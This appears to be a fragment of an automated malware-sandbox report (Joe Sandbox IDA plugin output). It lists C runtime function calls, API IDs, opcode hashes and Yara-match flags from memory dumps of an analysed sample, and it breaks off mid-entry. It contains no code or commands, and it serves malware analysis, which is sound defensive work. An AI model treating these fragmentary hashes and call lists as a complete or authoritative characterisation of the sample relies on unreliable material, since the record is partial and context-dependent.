                                            • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                            • Instruction ID: 4cace3a36ab4f96211a5124a0b7b9309c5d1ea736ff362843ef9ef6c07d23c3d
                                            • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                            • Instruction Fuzzy Hash: 11110A79C1030DBBCB04FFE5D455CDDBB7DAA04740B408566AD1897244EB74E3988F94
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free_malloc_wprintf$_sprintf
                                            • String ID:
                                            • API String ID: 3721157643-0
                                            • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                            • Instruction ID: e66e6d6fce36724f08fa0e87f28dcffd884ae719a26e05bfbc28b623991f5ddb
                                            • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                            • Instruction Fuzzy Hash: C11136F2A207607AC262A3F40C11FFF7BDD9F45302F0801A9FE9DD1184EA185A149BB1
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                            • String ID:
                                            • API String ID: 65388428-0
                                            • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                            • Instruction ID: 0480fd547939deeccef5ee13115130ab17575cab0bb5fd5beb0d1a90ef485787
                                            • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                            • Instruction Fuzzy Hash: DD516CB1D40219BBEB11DBE1DC86FEFBBB9FB04B04F100025F909B6180EB755A158BA5
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Exception@8Throw$_memset_sprintf
                                            • String ID:
                                            • API String ID: 217217746-0
                                            • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                            • Instruction ID: 72751cdf7d93f1fd42e82e8c5ff94951e3cd325bc4bf8f1fc81f6a52b789ccc9
                                            • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                            • Instruction Fuzzy Hash: 8B519FB1E50349AAEF11DFE1DD46FEEBBB9EB04704F100025F915B6180D7B5AA058BA4
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Exception@8Throw$_memset_sprintf
                                            • String ID:
                                            • API String ID: 217217746-0
                                            • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                            • Instruction ID: 6b86f23302bf7ba322934a602d736be9eff00a95366d40080c48abee4a0d10e2
                                            • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                            • Instruction Fuzzy Hash: 90516F71E50309BADF21DFE1DD46FEEBBB9EB04704F100129F915B6184EB74AA058BA4
                                            APIs
                                            • __init_pointers.LIBCMT ref: 0040819B
                                              • Part of subcall function 004039C9: EncodePointer.KERNEL32(00000000,?,004081A0,00403C79,00417EE8,00000014,00000003,00417D7C,00000003,00000001), ref: 004039CC
                                              • Part of subcall function 004039C9: __initp_misc_winsig.LIBCMT ref: 004039E7
                                              • Part of subcall function 004039C9: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00406EE2
                                              • Part of subcall function 004039C9: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00406EF6
                                              • Part of subcall function 004039C9: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00406F09
                                              • Part of subcall function 004039C9: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00406F1C
                                              • Part of subcall function 004039C9: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00406F2F
                                              • Part of subcall function 004039C9: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00406F42
                                              • Part of subcall function 004039C9: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00406F55
                                              • Part of subcall function 004039C9: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00406F68
                                              • Part of subcall function 004039C9: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00406F7B
                                              • Part of subcall function 004039C9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00406F8E
                                              • Part of subcall function 004039C9: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00406FA1
                                              • Part of subcall function 004039C9: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00406FB4
                                              • Part of subcall function 004039C9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00406FC7
                                              • Part of subcall function 004039C9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00406FDA
                                              • Part of subcall function 004039C9: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00406FED
                                              • Part of subcall function 004039C9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00407000
                                            • __mtinitlocks.LIBCMT ref: 004081A0
                                            • __mtterm.LIBCMT ref: 004081A9
                                            • __calloc_crt.LIBCMT ref: 004081CE
                                            • __initptd.LIBCMT ref: 004081F0
                                            • GetCurrentThreadId.KERNEL32 ref: 004081F7
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2310707332.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000007.00000002.2310682718.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2310837369.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311018653.0000000000419000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311092801.000000000041A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004AC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311389200.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_400000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Similarity
                                            • API ID: AddressProc$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                            • String ID:
                                            • API String ID: 1593083391-0
                                            • Opcode ID: 2466e6ac3821ec1ea969d76f66c41eea37a914adba7a39110b1150f063fbe81f
                                            • Instruction ID: 0f50fc1858b162662d1bff8aa5812b74fe88f6af64675ff285c82150316b21be
                                            • Opcode Fuzzy Hash: 2466e6ac3821ec1ea969d76f66c41eea37a914adba7a39110b1150f063fbe81f
                                            • Instruction Fuzzy Hash: F5F09632698B121AE6247B75BD03A4B3A849F01734B21467FF5A0F51D2FF389852419C
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                            • String ID:
                                            • API String ID: 3534693527-0
                                            • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                            • Instruction ID: 60b025a350fa01740e83d3f17e2e91a996928935ba553d3499a73d6d0828d97c
                                            • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                            • Instruction Fuzzy Hash: F031E8B2931336EBDB226BE49C00BAF67959F15B64F10C615ED04EB2DCDB748540CAA1
                                            APIs
                                            • __getptd_noexit.LIBCMT ref: 022D66DD
                                              • Part of subcall function 022359BF: __calloc_crt.LIBCMT ref: 022359E2
                                              • Part of subcall function 022359BF: __initptd.LIBCMT ref: 02235A04
                                            • __calloc_crt.LIBCMT ref: 022D6700
                                            • __get_sys_err_msg.LIBCMT ref: 022D671E
                                            • __invoke_watson.LIBCMT ref: 022D673B
                                            • __get_sys_err_msg.LIBCMT ref: 022D676D
                                            • __invoke_watson.LIBCMT ref: 022D678B
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                            • String ID:
                                            • API String ID: 4066021419-0
                                            • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                            • Instruction ID: 195beceb2ab2ac870eacc398127ff3e968c70f5bb395892c10662083fa637d92
                                            • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                            • Instruction Fuzzy Hash: 6E11C47162171A6BFB227EE5AC40BFA739DDF04760F000466FD08A6648E765D9008AE4
                                            APIs
                                            • _malloc.LIBCMT ref: 0040A4E3
                                              • Part of subcall function 00407CF0: __FF_MSGBANNER.LIBCMT ref: 00407D07
                                              • Part of subcall function 00407CF0: __NMSG_WRITE.LIBCMT ref: 00407D0E
                                              • Part of subcall function 00407CF0: HeapAlloc.KERNEL32(00530000,00000000,00000001,00000000,00000000,00000000,?,00404E54,00405CEC,00405CEC,00405CEC,00000000,?,00406D17,00000018,00417FF0), ref: 00407D33
                                            • _free.LIBCMT ref: 0040A4F6
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2310707332.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000007.00000002.2310682718.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2310837369.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311018653.0000000000419000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311092801.000000000041A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004AC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311389200.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_400000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Similarity
                                            • API ID: AllocHeap_free_malloc
                                            • String ID:
                                            • API String ID: 2734353464-0
                                            • Opcode ID: ef88af322abf05f13e7178e89560ae472e70d3679028a2eb92ded267479b5fbd
                                            • Instruction ID: 04e2fd8cb6c231030411bd4fc830e6cd263c170058c14dd275010e73f7b17e4c
                                            • Opcode Fuzzy Hash: ef88af322abf05f13e7178e89560ae472e70d3679028a2eb92ded267479b5fbd
                                            • Instruction Fuzzy Hash: 6A11CAB2904311BFCB213FB5FD05A5B3B94AF04369F10453BFA45BA2D1DA3C9960869E
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _memset
                                            • String ID: D
                                            • API String ID: 2102423945-2746444292
                                            • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                            • Instruction ID: 9e43dfd2e10ff055f32f772e6374569b431b6508736e147b85de5b9c72ffcc43
                                            • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                            • Instruction Fuzzy Hash: 48E15D71D1022AEACF24DFE0CD49FEEB7B8BF04304F144169E909A6194EB769A49CF54
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _memset
                                            • String ID: $$$(
                                            • API String ID: 2102423945-3551151888
                                            • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                            • Instruction ID: 18e12efcc15b8212b7334cdf990d6b62abef512b5a68538151ee3a69cc9298c2
                                            • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                            • Instruction Fuzzy Hash: 4191AC71D10219EAEF21CFE0C849BEEBBF5AF15304F144169D406B7284DBB65A48CFA5
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _wcsnlen
                                            • String ID: U
                                            • API String ID: 3628947076-3372436214
                                            • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                            • Instruction ID: 2de81546a9a08d9f1e3bd47ff866361e2df67fd940e29239687069930e2b62b3
                                            • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                            • Instruction Fuzzy Hash: CB215BB263430D7AEB019AE49C45BBE73ADDB49350F900165F90CCA198FF71EA508AA4
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _memset
                                            • String ID: p2Q
                                            • API String ID: 2102423945-1521255505
                                            • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                            • Instruction ID: 4548f819cf05fa721a7f8beb3c83d8e4fd1b77eead0652ad120ed9afd1acc253
                                            • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                            • Instruction Fuzzy Hash: A8F0ED78698754A5F7227B90BC26B857E917B31B09F104088E1182E2E5D3FD238CA79A
                                            APIs
                                            • std::exception::exception.LIBCMT ref: 0225FBF1
                                              • Part of subcall function 0224169C: std::exception::_Copy_str.LIBCMT ref: 022416B5
                                            • __CxxThrowException@8.LIBCMT ref: 0225FC06
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                                            • String ID: TeM$TeM
                                            • API String ID: 3662862379-3870166017
                                            • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                            • Instruction ID: 3cd2aca9c7b4cbeb1c62a993a0f4e0202a46b02cec2f1cbb44b527e4dbbc041b
                                            • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                            • Instruction Fuzzy Hash: 59D067B5C1030CBBCB04EFA5D459CDDBBB9AA04744B408466A91897245EA74E3998F94
                                            APIs
                                              • Part of subcall function 0223197D: __wfsopen.LIBCMT ref: 02231988
                                            • _fgetws.LIBCMT ref: 0221D15C
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __wfsopen_fgetws
                                            • String ID:
                                            • API String ID: 853134316-0
                                            • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                            • Instruction ID: 33f3d2ee45880dfa582efd98ba17f6baac15f36af19708685b89d6f83a805c70
                                            • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                            • Instruction Fuzzy Hash: 1A91A1B1D2031AEBCB25DFE4CC44BAEB7F5BF14304F140529E815A7245E7B6AA14CBA1
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _malloc$__except_handler4_fprintf
                                            • String ID:
                                            • API String ID: 1783060780-0
                                            • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                            • Instruction ID: 724a4720dfe1e748edc227a24592de93b31c656b1134eac511799c75364f0604
                                            • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                            • Instruction Fuzzy Hash: F0A16FB1C10348EBEF11EFE4C849BEEBBB6AF14304F140128D40576295D7B65A98CFA6
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                            • String ID:
                                            • API String ID: 2974526305-0
                                            • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                            • Instruction ID: 264030b789cc007f18cf57b33973c5a6856e714930f47f99dc449cecc1c1f30a
                                            • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                            • Instruction Fuzzy Hash: E85193F0A20306DBDB268FF988806AE77B6BF40724F148729EC35962D8D7709D51CB40
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2310707332.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000007.00000002.2310682718.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2310837369.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311018653.0000000000419000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311092801.000000000041A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004AC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311389200.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_400000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Similarity
                                            • API ID: AdjustPointer_memmove
                                            • String ID:
                                            • API String ID: 1721217611-0
                                            • Opcode ID: 2e16b2f250ccf092bc100bc5d9eb0148a1e3404600b578eb5dc17a41c6227076
                                            • Instruction ID: 1023fd3ee9deae40a3897b3c4534671c901a90ee44ce970cd19e6d1d91c053ed
                                            • Opcode Fuzzy Hash: 2e16b2f250ccf092bc100bc5d9eb0148a1e3404600b578eb5dc17a41c6227076
                                            • Instruction Fuzzy Hash: E441F6726043025AEB296E66D8A1F6773A49F00324F24483FF851A72D2EB7ADC80D61D
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040F0DB
                                            • __isleadbyte_l.LIBCMT ref: 0040F109
                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00401767,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,0040EC9E,00401767,00BFBBEF,00000003), ref: 0040F137
                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00401767,00000001,00BFBBEF,00000000,?,00000000,00000000,?,0040EC9E,00401767,00BFBBEF,00000003), ref: 0040F16D
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2310707332.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000007.00000002.2310682718.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2310837369.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311018653.0000000000419000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311092801.000000000041A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004AC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311389200.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_400000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Similarity
                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                            • String ID:
                                            • API String ID: 3058430110-0
                                            • Opcode ID: e4bbf927e83fbc5b63aae80ba798c57606ce401034a67355da64dfdf7d8d7c96
                                            • Instruction ID: 5de92f7f2687d373adb095d426ac8a2dddb017ef45a78cb29df6fddd234c77cd
                                            • Opcode Fuzzy Hash: e4bbf927e83fbc5b63aae80ba798c57606ce401034a67355da64dfdf7d8d7c96
                                            • Instruction Fuzzy Hash: 3F31BE30604246EBDB318F35CC44BAB7BA5FF41310F15813AE854AB6D1E735AC59DB98
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2310707332.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000007.00000002.2310682718.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2310837369.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311018653.0000000000419000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311092801.000000000041A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004AC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311389200.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_400000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Similarity
                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                            • String ID:
                                            • API String ID: 3016257755-0
                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                            • Instruction ID: 2bce6dc0e508213b7da3302ed687ec5b9600952184a77534c3023291f124957a
                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                            • Instruction Fuzzy Hash: 5A01457240014DBBCF125E94CC01CEE3F26BB18354F54842AFA5865271D63BC9B1AB86
                                            APIs
                                            • ___BuildCatchObject.LIBCMT ref: 00408E2F
                                              • Part of subcall function 00409446: ___AdjustPointer.LIBCMT ref: 0040948F
                                            • _UnwindNestedFrames.LIBCMT ref: 00408E46
                                            • ___FrameUnwindToState.LIBCMT ref: 00408E58
                                            • CallCatchBlock.LIBCMT ref: 00408E7C
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2310707332.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000007.00000002.2310682718.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2310837369.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311018653.0000000000419000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311092801.000000000041A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004AC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311389200.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_400000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Similarity
                                            • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                            • String ID:
                                            • API String ID: 2633735394-0
                                            • Opcode ID: f9d3b7a30e38f13d7fde29b061af4ea1347a5e88d77c866b69bca2c0e0536a04
                                            • Instruction ID: 265869700507a15a4e81e95e2d829c2481c7b218524b31d194bd6f00b1cd676d
                                            • Opcode Fuzzy Hash: f9d3b7a30e38f13d7fde29b061af4ea1347a5e88d77c866b69bca2c0e0536a04
                                            • Instruction Fuzzy Hash: B9012D32400109BBCF129F55CD01EDB3B76FF59754F05402AFA5871161C73AE861EBA8
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                            • String ID:
                                            • API String ID: 3016257755-0
                                            • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                            • Instruction ID: 704adabef952dd1b09671032d883304a57e33983cfa6c46ac939016620490a52
                                            • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                            • Instruction Fuzzy Hash: 6001363642025ABBCF125EC4DC11EEE3F62BF19358B488415FE5958828D376C5B2AB81
                                            APIs
                                            • ___BuildCatchObject.LIBCMT ref: 022D7A4B
                                              • Part of subcall function 022D8140: ___BuildCatchObjectHelper.LIBCMT ref: 022D8172
                                              • Part of subcall function 022D8140: ___AdjustPointer.LIBCMT ref: 022D8189
                                            • _UnwindNestedFrames.LIBCMT ref: 022D7A62
                                            • ___FrameUnwindToState.LIBCMT ref: 022D7A74
                                            • CallCatchBlock.LIBCMT ref: 022D7A98
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
